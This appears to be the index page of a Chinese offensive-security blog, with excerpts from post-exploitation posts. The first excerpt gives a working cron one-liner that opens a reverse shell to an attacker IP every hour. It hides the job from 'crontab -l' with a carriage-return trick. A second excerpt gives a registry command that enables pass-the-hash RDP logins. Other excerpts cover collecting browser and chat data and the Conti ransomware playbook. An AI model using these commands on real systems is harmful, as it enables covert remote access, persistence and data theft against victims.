Post-Exploit #内网渗透 #post-exploit

Tips in hide schedule tasks in Linux

(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/Attack-IP/PORT;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")

Administrator 发布于 2025-01-19

Post-Exploit #横向移动 #内网渗透 #post-exploit

NTLM Login RDP

Victim Machine shell REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f shell REG query "HKLM\

Administrator 发布于 2025-01-19

内网渗透 #内网渗透 #信息收集 #痕迹清理 #权限提升 #横向移动 #隧道搭建

内网渗透基础

前言本文主要对一些有用常用的但不太基础的内容作以记录信息收集 Chrome浏览器信息历史记录 %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\History 微信文件枚举微信账户接受的文件 dir /s /b C:\Us

Administrator 发布于 2024-11-11

威胁情报 #勒索组织 #RAAS #内网渗透

通过Conti勒索组织泄露的文件我们可以学到什么？

网站创建批处理脚本 http://tobbot.com/data/ 非常适合创建命令，然后生成批处理文件使用Tor网络进行工作接下来（对于那些还没有这样做的人），我建议将整个工作站转移到通过Tor网络工作。为此，您需要配置您的操作系统和Whonix（这是一个为您创建“安全的Tor隧道”的操作系

Administrator 发布于 2024-11-04

菜单

所有标签

Tips in hide schedule tasks in Linux

NTLM Login RDP

内网渗透基础

通过Conti勒索组织泄露的文件我们可以学到什么？

人工智能（AI）模型的安全挑战：多方面的风险剖析

Tips in hide schedule tasks in Linux

NTLM Login RDP

云原生安全攻防指南

Redis unauthorized post exploit

Cloud Hacking-(1)

使用汇编语言实现xor加密

Kubernetes 环境安全与权限检查

Mythic C2搭建（apollo&&sliver）

CobaltStrike攻击手册